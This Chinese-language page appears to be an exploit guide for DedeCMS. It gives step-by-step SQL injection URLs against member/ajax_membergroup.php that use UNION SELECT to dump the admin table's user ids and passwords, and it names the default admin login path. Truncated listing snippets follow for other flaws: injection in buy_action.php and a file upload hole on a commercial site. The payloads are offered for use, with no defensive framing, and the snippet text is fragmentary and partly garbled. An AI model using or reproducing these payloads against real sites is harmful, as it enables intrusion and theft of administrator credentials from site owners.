一、首先訪問「/data/admin/ver.txt」頁面獲取系統最後公升級時間,(判斷是否是dede的cms 以及看看是否和這個漏洞相對應)
二、然後訪問「/member/ajax_membergroup.php?action=post&membergroup=1」頁面 看是否可注入
三、爆使用者:/member/ajax_membergroup.php?action=post&membergroup=@`'` union select userid from `%23@__admin` where 1 or id=@`'` 檢視管理員id
四、爆密碼的字段:/member/ajax_membergroup.php?action=post&membergroup=@`'` union select pwd from `%23@__admin` where 1 or id=@`'`
預設後台:dede/login.php
Dedecms會員中心注入漏洞
詳細說明 member buy action.php require once dirname file config.php checkrank 0,0 menutype mydede menutype son op require once dedeinc.dedetemplate.class....
DedeCMS 支付頁面注入漏洞
影響版本 dodecms.官方 漏洞型別 sql注入 漏洞描述 dedecms.織夢buy action.php存在注入,可利用sql查詢 爆管理員使用者密碼。漏洞測試 爆管理帳號 member buy action.php?product member pid 1 20and 201 11 20u...
某酒業網會員註冊上傳漏洞
漏洞型別 檔案上傳 漏洞描述 檔案 sub upload.asp 01 02 if session admin name and session me name then 03 11 12 19 對不起,您不是會員,不會進行此項操作!20 else 21 22 dim arr 3 23 dim up...